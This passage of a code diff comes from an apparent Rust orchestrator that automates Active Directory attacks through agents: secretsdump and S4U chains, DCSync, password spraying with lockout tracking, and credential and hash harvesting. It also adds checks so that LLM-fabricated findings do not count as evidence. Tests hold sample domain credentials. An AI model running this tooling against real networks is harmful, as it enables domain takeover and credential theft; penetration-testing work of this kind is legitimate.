result_text_indicates_failure(result: &Option) -> bool { + let text = match result { + Some(v) => { + // Check both "summary" field and full JSON string + let summary = v.get("summary").and_then(|s| s.as_str()).unwrap_or(""); + if !summary.is_empty() { + summary.to_string() + } else { + v.to_string() + } + } + None => return false, + }; + let lower = text.to_lowercase(); + lower.starts_with("failed") + || lower.contains("\"failed:") + || lower.contains("\"failed ") + || lower.contains("failed to exploit") + || lower.contains("failed esc") + || lower.contains("missing required") + || lower.contains("missing ca") + || lower.contains("without ca name") + || lower.contains("cannot attempt") + || lower.contains("cannot execute") + || lower.contains("not available in") + || lower.contains("ept_s_not_registered") + || lower.contains("blocked:") + || lower.contains("invalidcredentials") + || lower.contains("status_account_locked") + || lower.contains("rpc_s_access_denied") +} + +/// Resolve the domain for hash/credential attribution from the task's target IP. +/// +/// Priority: +/// 1. Match target_ip to a known host's domain (hostname suffix → domain) +/// 2. Match target_ip to a domain controller entry +/// 3. Fall back to state.domains.first() +async fn resolve_domain_from_ip(dispatcher: &Arc, target_ip: Option<&str>) -> String { let state = dispatcher.state.read().await; + if let Some(ip) = target_ip { + // Check domain_controllers map first — most reliable + for (domain, dc_ip) in &state.domain_controllers { + if dc_ip == ip { + return domain.clone(); + } + } + // Derive domain from FQDN hostname (e.g. dc01.child.contoso.local + // → child.contoso.local) + for host in &state.hosts { + if host.ip == ip { + if let Some(dot) = host.hostname.find('.') { + return host.hostname[dot + 1..].to_string(); + } + } + } + } state.domains.first().cloned().unwrap_or_default() } @@ -326,6 +623,7 @@ async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc {} Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), @@ -351,19 +649,33 @@ async fn extract_from_raw_text( // Structured discoveries from tool-call parsers are already handled by // extract_discoveries() via the "discoveries" key — this pass is a secondary // safety net for raw tool stdout that parsers may have missed. - let mut text_parts: Vec<&str> = Vec::new(); + // Each item is either an object {name, arguments, output} (preferred — see + // `dispatcher::submission`) or a bare string (legacy / blue-team paths). + // Bare strings carry no tool context, so extractors fall back to untyped + // behavior; the structured form lets extractors gate on tool name + args + // (e.g. skip credential regex for hash-auth invocations of nxc). + let mut tool_outputs: Vec = Vec::new(); if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { for item in arr { if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); + tool_outputs.push(output_extraction::ToolOutputCtx { + arguments: None, + output: s, + }); + } else if let Some(obj) = item.as_object() { + let Some(s) = obj.get("output").and_then(|v| v.as_str()) else { + continue; + }; + tool_outputs.push(output_extraction::ToolOutputCtx { + arguments: obj.get("arguments"), + output: s, + }); } } } - if text_parts.is_empty() { + if tool_outputs.is_empty() { return; } @@ -372,8 +684,8 @@ async fn extract_from_raw_text( // context across unrelated tool calls — a joined string caused false // credential attribution (e.g. john.smith:Summer2025 from stale context). let mut extracted = output_extraction::TextExtractions::default(); - for part in &text_parts { - let partial = output_extraction::extract_from_output_text(part, default_domain); + for ctx in &tool_outputs { + let partial = output_extraction::extract_from_output_text(ctx, default_domain); extracted.credentials.extend(partial.credentials); extracted.hashes.extend(partial.hashes); extracted.hosts.extend(partial.hosts); @@ -389,9 +701,11 @@ async fn extract_from_raw_text( for cred in extracted.credentials { let is_cracked = cred.source.starts_with("cracked:"); - let cracked_username = cred.username.clone(); - let cracked_domain = cred.domain.clone(); - let cracked_password = cred.password.clone(); + let source = cred.source.clone(); + let username = cred.username.clone(); + let domain = cred.domain.clone(); + let password = cred.password.clone(); + let is_admin = cred.is_admin; match dispatcher .state .publish_credential(&dispatcher.queue, cred) @@ -399,6 +713,8 @@ async fn extract_from_raw_text( { Ok(true) => { new_count += 1; + create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) + .await; // When a cracked credential is published, update the corresponding // hash's cracked_password field in state and Redis. if is_cracked { @@ -406,9 +722,9 @@ async fn extract_from_raw_text( .state .update_hash_cracked_password( &dispatcher.queue, - &cracked_username, - &cracked_domain, - &cracked_password, + &username, + &domain, + &password, ) .await; } @@ -419,8 +735,24 @@ async fn extract_from_raw_text( } for hash in extracted.hashes { + let username = hash.username.clone(); + let domain = hash.domain.clone(); + let hash_type = hash.hash_type.clone(); + let hash_value = hash.hash_value.clone(); + let source = hash.source.clone(); match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => new_count += 1, + Ok(true) => { + new_count += 1; + create_hash_timeline_event( + dispatcher, + &username, + &domain, + &hash_type, + &hash_value, + &source, + ) + .await; + } Ok(false) => {} Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), } @@ -454,9 +786,9 @@ async fn extract_from_raw_text( // immediate high-priority secretsdump. // Check each tool output independently (joining is safe here — Pwn3d! is a // standalone marker with no stateful context to leak). - for part in &text_parts { - if part.contains("Pwn3d!") { - detect_and_upgrade_admin_credentials(part, dispatcher).await; + for ctx in &tool_outputs { + if ctx.output.contains("Pwn3d!") { + detect_and_upgrade_admin_credentials(ctx.output, dispatcher).await; } } diff --git a/ares-cli/src/orchestrator/result_processing/parsing.rs b/ares-cli/src/orchestrator/result_processing/parsing.rs index 8a0d1c1b..27dc43d4 100644 --- a/ares-cli/src/orchestrator/result_processing/parsing.rs +++ b/ares-cli/src/orchestrator/result_processing/parsing.rs @@ -107,7 +107,14 @@ pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { } } // Users -- defense-in-depth: only accept entries with a parser-verified source. - const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; + const TRUSTED_USER_SOURCES: &[&str] = &[ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ]; if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { for user_val in users { if let Ok(user) = serde_json::from_value::(user_val.clone()) { diff --git a/ares-cli/src/orchestrator/result_processing/tests.rs b/ares-cli/src/orchestrator/result_processing/tests.rs index 42e46699..0f3a01e4 100644 --- a/ares-cli/src/orchestrator/result_processing/tests.rs +++ b/ares-cli/src/orchestrator/result_processing/tests.rs @@ -3,9 +3,84 @@ use super::admin_checks::{ }; use super::parsing::{has_domain_admin_indicator, parse_discoveries, resolve_parent_id}; use super::timeline::{credential_techniques, hash_techniques, is_critical_hash}; +use super::{result_has_credential_evidence, result_has_parser_evidence}; use ares_core::models::{Credential, Hash}; use serde_json::json; +#[test] +fn parser_evidence_requires_discoveries_key() { + // No payload at all → no evidence + assert!(!result_has_parser_evidence(&None)); + // Payload without discoveries → no evidence + assert!(!result_has_parser_evidence(&Some(json!({"summary": "ok"})))); + // Empty discoveries object → no evidence + assert!(!result_has_parser_evidence(&Some( + json!({"discoveries": {}}) + ))); + // Empty arrays → no evidence + assert!(!result_has_parser_evidence(&Some( + json!({"discoveries": {"credentials": [], "hashes": []}}) + ))); +} + +#[test] +fn parser_evidence_accepts_any_populated_array() { + for key in [ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ] { + let payload = json!({"discoveries": {key: [{"placeholder": true}]}}); + assert!( + result_has_parser_evidence(&Some(payload)), + "key {key} should count as parser evidence" + ); + } +} + +#[test] +fn credential_evidence_only_credentials_or_hashes() { + // Only hosts → not credential evidence + assert!(!result_has_credential_evidence(&Some( + json!({"discoveries": {"hosts": [{"ip": "192.168.58.10"}]}}) + ))); + // Credentials present → credential evidence + assert!(result_has_credential_evidence(&Some( + json!({"discoveries": {"credentials": [{"username": "admin"}]}}) + ))); + // Hashes present → credential evidence + assert!(result_has_credential_evidence(&Some( + json!({"discoveries": {"hashes": [{"username": "admin"}]}}) + ))); + // Vulnerabilities alone are NOT credential evidence (would be parser evidence) + assert!(!result_has_credential_evidence(&Some( + json!({"discoveries": {"vulnerabilities": [{"vuln_id": "v1"}]}}) + ))); +} + +#[test] +fn llm_findings_field_is_not_treated_as_evidence() { + // LLM-fabricated findings live under `llm_findings`, never `discoveries`. + // The grounding check must IGNORE them. + let payload = json!({ + "summary": "claimed exploit success", + "llm_findings": [{ + "vulnerabilities": [{ + "vuln_id": "finding_kerberoastable_account_192_168_58_10", + "vuln_type": "kerberoastable_account", + }] + }] + }); + assert!(!result_has_parser_evidence(&Some(payload.clone()))); + assert!(!result_has_credential_evidence(&Some(payload))); +} + #[test] fn parse_credentials_array() { let payload = json!({ @@ -669,6 +744,8 @@ fn parse_shares_with_comment() { assert_eq!(parsed.shares[0].comment, "Logon server share"); } +// --- parse_pwned_line tests --- + #[test] fn pwned_line_standard_format() { let line = "[+] CONTOSO\\admin:P@ssw0rd! (Pwn3d!)"; @@ -745,6 +822,8 @@ fn pwned_line_username_with_special_chars() { ); } +// --- extract_ip_from_line tests --- + #[test] fn extract_ip_basic() { let line = "SMB 192.168.58.10 445 DC01 [+] CONTOSO\\admin (Pwn3d!)"; @@ -789,6 +868,8 @@ fn extract_ip_boundary_values() { assert_eq!(extract_ip_from_line(line), Some("0.0.0.0".to_string())); } +// --- has_golden_ticket_indicator tests --- + #[test] fn golden_ticket_indicator_present() { let text = "Saving ticket in administrator.ccache"; @@ -818,6 +899,8 @@ fn golden_ticket_indicator_both_present_not_adjacent() { assert!(has_golden_ticket_indicator(text)); } +// --- resolve_da_path tests --- + #[test] fn da_path_explicit_flag_with_path() { let payload = json!({ @@ -863,6 +946,8 @@ fn da_path_null_flag_defaults_to_krbtgt() { ); } +// --- credential_techniques tests --- + #[test] fn credential_techniques_admin_base() { let t = credential_techniques("manual", true); @@ -920,6 +1005,8 @@ fn credential_techniques_empty_source() { assert_eq!(t, vec!["T1552"]); } +// --- hash_techniques tests --- + #[test] fn hash_techniques_base() { let t = hash_techniques("aabbccdd", "ntlm", "manual"); @@ -1005,6 +1092,8 @@ fn hash_techniques_as_rep_hyphenated_source() { assert!(t.contains(&"T1558.004".to_string())); } +// --- is_critical_hash tests --- + #[test] fn critical_hash_krbtgt() { assert!(is_critical_hash("krbtgt")); @@ -1036,3 +1125,104 @@ fn critical_hash_partial_match() { assert!(!is_critical_hash("krbtgt_backup")); assert!(!is_critical_hash("admin")); } + +#[test] +fn extract_locked_users_basic_netexec_format() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": [ + "SMB 192.168.58.10 445 DC01 [-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT\n\ + SMB 192.168.58.10 445 DC01 [+] CONTOSO\\testuser3:testuser3 (Pwn3d!)\n\ + SMB 192.168.58.10 445 DC01 [-] CONTOSO\\testuser2:testuser2 STATUS_ACCOUNT_LOCKED_OUT" + ] + }); + let mut locked = extract_locked_usernames_from_result(&Some(payload)); + locked.sort(); + assert_eq!( + locked, + vec![ + ("testuser1".to_string(), Some("contoso".to_string())), + ("testuser2".to_string(), Some("contoso".to_string())), + ] + ); +} + +#[test] +fn extract_locked_users_kdc_revoked_format() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "summary": "[-] CONTOSO\\testuser1:testuser1 KDC_ERR_CLIENT_REVOKED" + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert_eq!( + locked, + vec![("testuser1".to_string(), Some("contoso".to_string()))] + ); +} + +#[test] +fn extract_locked_users_skips_disabled_builtins() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": [ + "[-] CONTOSO\\Guest:Guest STATUS_ACCOUNT_LOCKED_OUT\n\ + [-] CONTOSO\\krbtgt:krbtgt STATUS_ACCOUNT_LOCKED_OUT\n\ + [-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT" + ] + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert_eq!( + locked, + vec![("testuser1".to_string(), Some("contoso".to_string()))] + ); +} + +#[test] +fn extract_locked_users_dedups_repeats() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": [ + "[-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT\n\ + [-] CONTOSO\\testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT" + ] + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert_eq!(locked.len(), 1); +} + +#[test] +fn extract_locked_users_no_matches_returns_empty() { + use super::extract_locked_usernames_from_result; + let payload = json!({ + "tool_outputs": ["[+] CONTOSO\\testuser1:testuser1 (Pwn3d!)"] + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert!(locked.is_empty()); +} + +#[test] +fn extract_locked_users_rejects_bare_principal() { + use super::extract_locked_usernames_from_result; + // Bare `user:pass` (no DOMAIN\ prefix) is rejected — netexec always + // emits the canonical `DOMAIN\user:pass` form on auth events. + let payload = json!({ + "summary": "[-] testuser1:testuser1 STATUS_ACCOUNT_LOCKED_OUT" + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert!(locked.is_empty()); +} + +#[test] +fn extract_locked_users_rejects_llm_narrative_tokens() { + use super::extract_locked_usernames_from_result; + // LLM summary text often contains `word:` tokens (technique names, + // password values, list bullets) that are not principals. The + // backslash gate prevents these from being misclassified. + let payload = json!({ + "summary": "1) username_as_password: returned STATUS_ACCOUNT_LOCKED_OUT\n\ + Notable: P@ssw0rd1 spray got STATUS_ACCOUNT_LOCKED_OUT\n\ + auth: failed with STATUS_ACCOUNT_LOCKED_OUT" + }); + let locked = extract_locked_usernames_from_result(&Some(payload)); + assert!(locked.is_empty(), "got false positives: {locked:?}"); +} diff --git a/ares-cli/src/orchestrator/result_processing/timeline.rs b/ares-cli/src/orchestrator/result_processing/timeline.rs index 6231da75..843bc370 100644 --- a/ares-cli/src/orchestrator/result_processing/timeline.rs +++ b/ares-cli/src/orchestrator/result_processing/timeline.rs @@ -115,10 +115,140 @@ pub(crate) async fn create_hash_timeline_event( .await; } +/// Emit a timeline event when a credential is upgraded to admin (Pwn3d! detected). +pub(crate) async fn create_admin_upgrade_timeline_event( + dispatcher: &Arc, + username: &str, + domain: &str, +) { + let techniques = vec!["T1078".to_string()]; // Valid Accounts + let event_id = format!( + "evt-admin-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "admin_upgrade", + "description": format!("Admin access confirmed: {domain}\\{username} (Pwn3d!)"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event when a vulnerability is exploited. +pub(crate) async fn create_exploitation_timeline_event( + dispatcher: &Arc, + vuln_id: &str, + task_id: &str, +) { + let techniques = exploitation_techniques(vuln_id); + let event_id = format!( + "evt-exploit-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploitation", + "description": format!("Vulnerability exploited: {vuln_id} (task {task_id})"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event for lateral movement via S4U/delegation. +pub(crate) async fn create_lateral_movement_timeline_event( + dispatcher: &Arc, + target: &str, + _ticket_path: &str, +) { + let techniques = vec![ + "T1550.003".to_string(), // Use Alternate Authentication Material: Pass the Ticket + "T1021".to_string(), // Remote Services + ]; + let event_id = format!( + "evt-lateral-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "s4u_lateral_movement", + "description": format!("Lateral movement via S4U delegation to {target}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Emit a timeline event when Domain Admin is achieved. +pub(crate) async fn create_domain_admin_timeline_event( + dispatcher: &Arc, + domain: &str, + path: Option<&str>, +) { + let techniques = vec![ + "T1003.006".to_string(), // OS Credential Dumping: DCSync + "T1078.002".to_string(), // Valid Accounts: Domain Accounts + ]; + let event_id = format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let description = match path { + Some(p) => format!("CRITICAL: Domain Admin achieved for {domain} via {p}"), + None => format!("CRITICAL: Domain Admin achieved for {domain}"), + }; + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "domain_admin", + "description": description, + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; +} + +/// Map vulnerability IDs to MITRE ATT&CK technique IDs. +fn exploitation_techniques(vuln_id: &str) -> Vec { + let vuln_lower = vuln_id.to_lowercase(); + let mut techniques = vec!["T1210".to_string()]; // Exploitation of Remote Services (base) + if vuln_lower.contains("constrained_delegation") { + techniques.push("T1558.003".to_string()); // Kerberoasting (S4U) + } + if vuln_lower.contains("unconstrained_delegation") { + techniques.push("T1558".to_string()); // Steal or Forge Kerberos Tickets + } + if vuln_lower.contains("mssql") { + techniques.push("T1505".to_string()); // Server Software Component + } + if vuln_lower.contains("esc1") || vuln_lower.contains("esc4") || vuln_lower.contains("esc8") { + techniques.push("T1649".to_string()); // Steal or Forge Authentication Certificates + } + if vuln_lower.contains("rbcd") { + techniques.push("T1134.001".to_string()); // Access Token Manipulation: Token Impersonation + } + if vuln_lower.contains("smb_signing") { + techniques.push("T1557.001".to_string()); // LLMNR/NBT-NS Poisoning (relay) + } + techniques +} + #[cfg(test)] mod tests { use super::*; + // --- credential_techniques --- + #[test] fn credential_techniques_admin() { let t = credential_techniques("nxc-smb", true); @@ -170,6 +300,8 @@ mod tests { assert!(t.contains(&"T1558.003".to_string())); } + // --- hash_techniques --- + #[test] fn hash_techniques_base() { let t = hash_techniques("aabbccdd", "ntlm", "manual"); @@ -236,6 +368,8 @@ mod tests { assert!(!t.contains(&"T1003.006".to_string())); } + // --- is_critical_hash --- + #[test] fn critical_hash_krbtgt() { assert!(is_critical_hash("krbtgt")); @@ -250,4 +384,54 @@ mod tests { fn critical_hash_regular_user() { assert!(!is_critical_hash("jsmith")); } + + // --- exploitation_techniques --- + + #[test] + fn exploitation_techniques_base() { + let t = exploitation_techniques("some_vuln"); + assert!(t.contains(&"T1210".to_string())); + } + + #[test] + fn exploitation_techniques_constrained_delegation() { + let t = exploitation_techniques("constrained_delegation_dc01"); + assert!(t.contains(&"T1558.003".to_string())); + } + + #[test] + fn exploitation_techniques_mssql() { + let t = exploitation_techniques("mssql_impersonation_sql01"); + assert!(t.contains(&"T1505".to_string())); + } + + #[test] + fn exploitation_techniques_esc1() { + let t = exploitation_techniques("esc1_template"); + assert!(t.contains(&"T1649".to_string())); + } + + #[test] + fn exploitation_techniques_esc4() { + let t = exploitation_techniques("esc4_template"); + assert!(t.contains(&"T1649".to_string())); + } + + #[test] + fn exploitation_techniques_rbcd() { + let t = exploitation_techniques("rbcd_dc01"); + assert!(t.contains(&"T1134.001".to_string())); + } + + #[test] + fn exploitation_techniques_smb_signing() { + let t = exploitation_techniques("smb_signing_disabled_192.168.58.10"); + assert!(t.contains(&"T1557.001".to_string())); + } + + #[test] + fn exploitation_techniques_unconstrained() { + let t = exploitation_techniques("unconstrained_delegation_ws01"); + assert!(t.contains(&"T1558".to_string())); + } } diff --git a/ares-cli/src/orchestrator/results.rs b/ares-cli/src/orchestrator/results.rs index bd1f1f02..14b0364c 100644 --- a/ares-cli/src/orchestrator/results.rs +++ b/ares-cli/src/orchestrator/results.rs @@ -13,6 +13,7 @@ use tokio::sync::{mpsc, watch}; use tracing::{debug, error, info, warn}; use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::dispatcher::CredentialInflight; use crate::orchestrator::routing::ActiveTaskTracker; use crate::orchestrator::task_queue::{TaskQueue, TaskResult}; @@ -29,6 +30,7 @@ pub struct CompletedTask { pub fn spawn_result_consumer( queue: TaskQueue, tracker: ActiveTaskTracker, + credential_inflight: CredentialInflight, config: Arc, mut shutdown: watch::Receiver, ) -> (tokio::task::JoinHandle<()>, mpsc::Receiver) { @@ -48,7 +50,7 @@ pub fn spawn_result_consumer( break; } - match consume_cycle(&queue, &tracker, &tx).await { + match consume_cycle(&queue, &tracker, &credential_inflight, &tx).await { Ok(found) => { if consecutive_failures > 0 { info!( @@ -124,6 +126,7 @@ pub fn spawn_result_consumer( async fn consume_cycle( queue: &TaskQueue, tracker: &ActiveTaskTracker, + credential_inflight: &CredentialInflight, tx: &mpsc::Sender, ) -> Result { let task_ids = tracker.task_ids().await; @@ -139,8 +142,15 @@ async fn consume_cycle( let mut found = 0_usize; for (task_id, maybe_result) in results { if let Some(result) = maybe_result { - // Remove from tracker - tracker.remove(&task_id).await; + // Remove from tracker and release the per-credential inflight + // slot the task was holding (if any). The slot is now bound to + // the tracker entry's lifetime, so a hung tokio future never + // pins the slot indefinitely. + if let Some(removed) = tracker.remove(&task_id).await { + if let Some(ref key) = removed.credential_key { + credential_inflight.release(key).await; + } + } // Send to main loop let completed = CompletedTask { diff --git a/ares-cli/src/orchestrator/routing.rs b/ares-cli/src/orchestrator/routing.rs index 7f450c3c..df80df4a 100644 --- a/ares-cli/src/orchestrator/routing.rs +++ b/ares-cli/src/orchestrator/routing.rs @@ -15,6 +15,14 @@ pub struct ActiveTask { pub task_type: String, pub role: String, pub submitted_at: std::time::Instant, + /// `"user@domain"` when the task is gated by `CredentialInflight`. The + /// caller that successfully removes this task from the tracker is + /// responsible for releasing the corresponding slot. Carrying it on the + /// task makes the release happen even when stale-task cleanup evicts a + /// task whose spawned future is still hung — otherwise the slot leaks + /// and every subsequent task with the same credential gets deferred + /// forever. + pub credential_key: Option, } /// Thread-safe tracker for all in-flight tasks. @@ -81,7 +89,6 @@ impl ActiveTaskTracker { } /// Total active tasks across all roles. - #[cfg(test)] pub async fn total(&self) -> usize { let inner = self.inner.lock().await; inner.tasks.len() @@ -138,6 +145,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; @@ -173,6 +181,7 @@ mod tests { task_type: task_type.into(), role: role.into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; } @@ -191,6 +200,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now() - std::time::Duration::from_secs(120), + credential_key: None, }) .await; @@ -200,6 +210,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; @@ -219,6 +230,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; tracker @@ -227,6 +239,7 @@ mod tests { task_type: "exploit".into(), role: "privesc".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; @@ -245,6 +258,7 @@ mod tests { task_type: "recon".into(), role: "recon".into(), submitted_at: std::time::Instant::now(), + credential_key: None, }) .await; tracker.remove("t1").await; diff --git a/ares-cli/src/orchestrator/state/dedup.rs b/ares-cli/src/orchestrator/state/dedup.rs index bf3cd920..7a6d0608 100644 --- a/ares-cli/src/orchestrator/state/dedup.rs +++ b/ares-cli/src/orchestrator/state/dedup.rs @@ -3,6 +3,7 @@ use anyhow::Result; use redis::AsyncCommands; +use ares_core::models::VulnerabilityInfo; use ares_core::state; use redis::aio::ConnectionLike; @@ -10,8 +11,23 @@ use redis::aio::ConnectionLike; use super::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; +/// After this many consecutive failed exploit dispatches for the same vuln, +/// the exploitation workflow stops re-dispatching it. Set just high enough +/// to absorb transient failures (LLM hiccups, throttle bumps) while still +/// catching unsatisfiable preconditions in well under an hour: +/// 5 attempts × 120s cooldown = ~10 min ceiling per stuck vuln. +pub const MAX_EXPLOIT_FAILURES: u32 = 5; + impl SharedState { /// Mark a vulnerability as exploited. + /// + /// Also marks any vulnerabilities superseded by this exploit. A successful + /// `mssql_impersonation`/`mssql_linked_server` on a host implies the + /// host-level `mssql_access` is exploited too; a `dc_secretsdump_` + /// makes any `forest_trust_escalation` or `child_to_parent` whose + /// `target_domain == ` moot — the trust-key chain was rendered + /// unnecessary because the target was reached by another path. Without + /// this, the loot view shows artificial ✗ rows whose goal was already met. pub async fn mark_exploited( &self, queue: &TaskQueueCore, @@ -27,12 +43,31 @@ impl SharedState { operation_id, state::KEY_EXPLOITED ); + + // Compute superseded vuln_ids from in-memory discovered_vulnerabilities. + let superseded: Vec = { + let state = self.inner.read().await; + let primary = state.discovered_vulnerabilities.get(vuln_id); + compute_superseded(vuln_id, primary, &state.discovered_vulnerabilities) + }; + let mut conn = queue.connection(); let _: () = conn.sadd(&key, vuln_id).await?; + for sid in &superseded { + let _: () = conn.sadd(&key, sid).await?; + } let _: () = conn.expire(&key, 86400).await?; let mut state = self.inner.write().await; state.exploited_vulnerabilities.insert(vuln_id.to_string()); + for sid in superseded { + tracing::info!( + primary = %vuln_id, + superseded = %sid, + "Marking superseded vulnerability as exploited" + ); + state.exploited_vulnerabilities.insert(sid); + } Ok(()) } @@ -60,6 +95,30 @@ impl SharedState { Ok(()) } + /// Remove a dedup set entry from Redis (used to allow retries after a + /// transient failure such as auth-mismatch on enumeration). + pub async fn unpersist_dedup( + &self, + queue: &TaskQueueCore, + set_name: &str, + key: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let mut conn = queue.connection(); + let _: () = conn.srem(&redis_key, key).await?; + Ok(()) + } + /// Persist MSSQL enum dispatched entry to Redis. pub async fn persist_mssql_dispatched( &self, @@ -81,18 +140,150 @@ impl SharedState { let _: () = conn.expire(&redis_key, 86400).await?; Ok(()) } + + /// Remove an MSSQL enum dispatched entry from Redis so the next + /// `auto_mssql_detection` tick can re-publish a vuln for that host. + #[allow(dead_code)] + pub async fn unpersist_mssql_dispatched( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mut conn = queue.connection(); + let _: () = conn.srem(&redis_key, ip).await?; + Ok(()) + } + + /// Increment the failure counter for `vuln_id` and return the new count. + /// Called from result processing on every failed exploit task. When the + /// count reaches `MAX_EXPLOIT_FAILURES` the exploitation workflow will + /// abandon the vuln on the next pop. + pub async fn record_exploit_failure(&self, vuln_id: &str) -> u32 { + let mut state = self.inner.write().await; + let count = state + .exploit_failure_counts + .entry(vuln_id.to_string()) + .and_modify(|c| *c += 1) + .or_insert(1); + *count + } + + /// Returns true once `vuln_id` has accumulated `MAX_EXPLOIT_FAILURES` + /// consecutive failures. Checked by the exploitation workflow before + /// dispatching a vuln from the priority queue. + pub async fn is_exploit_abandoned(&self, vuln_id: &str) -> bool { + let state = self.inner.read().await; + state + .exploit_failure_counts + .get(vuln_id) + .map(|c| *c >= MAX_EXPLOIT_FAILURES) + .unwrap_or(false) + } +} + +/// Given the primary vuln being marked exploited, return additional vuln_ids +/// that this exploit logically supersedes. Pure function — no I/O — so it can +/// be unit tested directly. +fn compute_superseded( + vuln_id: &str, + primary: Option<&VulnerabilityInfo>, + discovered: &std::collections::HashMap, +) -> Vec { + let Some(primary) = primary else { + return Vec::new(); + }; + let mut out = Vec::new(); + match primary.vuln_type.as_str() { + // Host-deep MSSQL exploits supersede the host-level mssql_access vuln + // — getting EXECUTE AS or linked-server pivot proves the access path + // worked. + "mssql_impersonation" | "mssql_linked_server" | "mssql_xpcmdshell" => { + for (vid, v) in discovered { + if vid == vuln_id { + continue; + } + if v.vuln_type == "mssql_access" && v.target == primary.target { + out.push(vid.clone()); + } + } + } + // Once a domain is fully compromised via DCSync, any trust-chain or + // child-to-parent vuln whose `target_domain` is that domain is moot. + "dc_secretsdump" => { + let dominated = primary + .details + .get("domain") + .and_then(|v| v.as_str()) + .map(str::to_lowercase); + let Some(dominated) = dominated else { + return out; + }; + for (vid, v) in discovered { + if vid == vuln_id { + continue; + } + if !matches!( + v.vuln_type.as_str(), + "forest_trust_escalation" | "child_to_parent" + ) { + continue; + } + let tgt = v + .details + .get("target_domain") + .and_then(|d| d.as_str()) + .map(str::to_lowercase) + .unwrap_or_default(); + if tgt == dominated { + out.push(vid.clone()); + } + } + } + _ => {} + } + out } #[cfg(test)] mod tests { + use super::{compute_superseded, MAX_EXPLOIT_FAILURES}; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; + use ares_core::models::VulnerabilityInfo; use ares_core::state::mock_redis::MockRedisConnection; + use std::collections::HashMap; fn mock_queue() -> TaskQueueCore { TaskQueueCore::from_connection(MockRedisConnection::new()) } + fn vuln(id: &str, vtype: &str, target: &str, details: &[(&str, &str)]) -> VulnerabilityInfo { + let mut d = HashMap::new(); + for (k, v) in details { + d.insert(k.to_string(), serde_json::Value::String(v.to_string())); + } + VulnerabilityInfo { + vuln_id: id.to_string(), + vuln_type: vtype.to_string(), + target: target.to_string(), + discovered_by: "test".to_string(), + discovered_at: chrono::Utc::now(), + details: d, + recommended_agent: String::new(), + priority: 1, + } + } + #[tokio::test] async fn mark_exploited_adds_to_state_and_redis() { let state = SharedState::new("op-1".to_string()); @@ -150,4 +341,194 @@ mod tests { .unwrap(); assert!(members.contains("192.168.58.5")); } + + #[test] + fn supersede_mssql_impersonation_supersedes_host_access() { + let mut discovered = HashMap::new(); + discovered.insert( + 